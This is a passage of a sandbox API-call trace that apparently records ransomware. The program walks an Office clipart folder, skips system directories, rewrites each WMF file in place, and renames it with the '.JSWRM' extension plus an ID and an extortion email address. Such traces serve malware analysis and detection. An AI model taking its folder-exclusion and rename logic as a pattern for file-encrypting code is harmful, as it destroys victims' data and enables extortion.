hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0082.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.244] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40cc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107364.WMF", cAlternateFileName="")) returned 1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2=".") returned 1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="..") returned 1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="...") returned 1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="windows") returned -1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="recovery") returned -1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="perflogs") returned -1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="documents and settings") returned 1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="system volume information") returned -1 [0082.244] lstrcmpiW (lpString1="J0107364.WMF", lpString2="msocache") returned -1 [0082.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0082.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107364.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107364.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107364.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0082.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0082.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107364.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107364.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107364.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0082.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0082.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.245] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16588) returned 1 [0082.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40c0) returned 0x24d210 [0082.245] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x40c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x40c0, lpOverlapped=0x0) returned 1 [0082.248] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.248] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x40c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x40c0, lpOverlapped=0x0) returned 1 [0082.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.248] CloseHandle (hObject=0x314) returned 1 [0082.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0082.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0082.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0082.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0082.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0082.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0082.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.249] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107364.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107364.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0082.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.249] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ce4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107426.WMF", cAlternateFileName="")) returned 1 [0082.249] lstrcmpiW (lpString1="J0107426.WMF", lpString2=".") returned 1 [0082.249] lstrcmpiW (lpString1="J0107426.WMF", lpString2="..") returned 1 [0082.249] lstrcmpiW (lpString1="J0107426.WMF", lpString2="...") returned 1 [0082.250] lstrcmpiW (lpString1="J0107426.WMF", lpString2="windows") returned -1 [0082.250] lstrcmpiW (lpString1="J0107426.WMF", lpString2="recovery") returned -1 [0082.250] lstrcmpiW (lpString1="J0107426.WMF", lpString2="perflogs") returned -1 [0082.250] lstrcmpiW (lpString1="J0107426.WMF", lpString2="documents and settings") returned 1 [0082.250] lstrcmpiW (lpString1="J0107426.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.250] lstrcmpiW (lpString1="J0107426.WMF", lpString2="system volume information") returned -1 [0082.250] lstrcmpiW (lpString1="J0107426.WMF", lpString2="msocache") returned -1 [0082.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0082.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107426.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107426.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107426.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0082.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107426.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107426.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107426.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0082.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0082.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.251] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11492) returned 1 [0082.251] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ce0) returned 0x24d210 [0082.251] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ce0, lpOverlapped=0x0) returned 1 [0082.253] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.253] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ce0, lpOverlapped=0x0) returned 1 [0082.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.253] CloseHandle (hObject=0x314) returned 1 [0082.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0082.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.253] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0082.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0082.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0082.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0082.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0082.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.254] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107426.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107426.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0082.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0082.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0082.255] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7680, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107446.WMF", cAlternateFileName="")) returned 1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2=".") returned 1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="..") returned 1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="...") returned 1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="windows") returned -1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="recovery") returned -1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="perflogs") returned -1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="documents and settings") returned 1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="system volume information") returned -1 [0082.255] lstrcmpiW (lpString1="J0107446.WMF", lpString2="msocache") returned -1 [0082.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0082.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107446.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107446.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107446.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0082.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0082.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107446.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107446.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107446.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0082.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0082.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0082.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.256] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30336) returned 1 [0082.256] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7680) returned 0x24d210 [0082.256] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7680, lpOverlapped=0x0) returned 1 [0082.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.259] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7680, lpOverlapped=0x0) returned 1 [0082.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.260] CloseHandle (hObject=0x314) returned 1 [0082.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0082.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0082.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0082.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0082.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0082.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.265] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107446.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107446.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0082.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.265] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1338, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107450.WMF", cAlternateFileName="")) returned 1 [0082.265] lstrcmpiW (lpString1="J0107450.WMF", lpString2=".") returned 1 [0082.265] lstrcmpiW (lpString1="J0107450.WMF", lpString2="..") returned 1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="...") returned 1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="windows") returned -1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="recovery") returned -1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="perflogs") returned -1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="documents and settings") returned 1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="system volume information") returned -1 [0082.266] lstrcmpiW (lpString1="J0107450.WMF", lpString2="msocache") returned -1 [0082.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0082.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107450.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107450.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107450.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 